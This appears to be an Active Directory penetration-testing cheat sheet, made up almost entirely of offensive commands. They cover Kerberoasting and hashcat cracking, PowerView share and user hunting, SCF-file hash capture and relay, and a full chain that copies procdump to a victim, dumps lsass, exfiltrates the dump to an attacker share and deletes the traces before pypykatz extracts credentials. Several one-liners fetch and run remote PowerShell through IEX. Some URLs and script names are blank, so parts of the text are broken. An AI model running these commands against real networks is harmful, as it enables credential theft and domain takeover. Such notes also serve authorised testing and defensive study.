Get hashes using impacket -request -save -dc-ip <IP> domain/user
hashcat1 -m 13100 -r rules/<rule> <hashes file> wordlists/<wordlist>
Find shares:
powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('’);Invoke-ShareFinder"
CrackMapExec --shares module, grep output for WRITE.
Plant scf file on share using cme --scuffy module:
Use Metasploit SMB server module or Responder to capture/crack or relay hashes.
cme smb [/path/to/FileWithIPsOrNetworks] -u [username] -p [password] | tee /path/to/logfile.log
Note: If using a local account, add the --local-auth option. If using a hash instead of password, use -H [hash] instead of -p.
All Domain Admins:
powershell -exec bypass -c IEX (iwr '');Invoke-UserHunter -CheckAccess
Single User:
powershell -exec bypass -c IEX (iwr '');Invoke-UserHunter -UserName <username> -CheckAccess
powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('’);Invoke-ShareFinder"
Find all members of a group
powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('’);Invoke-UserHunter -GroupName <group>"
powershell -exec bypass -c IEX (iwr '');Invoke-Bloodhound -CollectionMethod all
Exchange your privileges for Domain Admin privs by abusing Exchange:
powershell -exec bypass -c IEX (iwr '');Invoke-UserHunter -CheckAccess
Note: I don't use Mimikatz on production systems. I dump lsass.exe and use Mimikatz on a system that I control to dump creds from the dump file.
Requires Impacket and pypykatz
Install pypykatz:
pip3 install pypykatz
Run Impacket
./ <share name> <path to directory where you have procdump64.exe>
Run Impacket
./ <domain>/<username>:<password>@<Victim IP> 'copy \\<PTK IP>\<share>\procdump64.exe . & procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp & copy lsass.dmp \\<PTK IP>\<share>\ & del lsass.dmp & del procdump64.exe'
Dump credentials from lsass dump file
pypykatz minidump lsass.dmp
Note: Sometimes you may get an error when using pypykatz. In that case you'll have to copy the dump file to a Windows system under your control and use Mimikatz.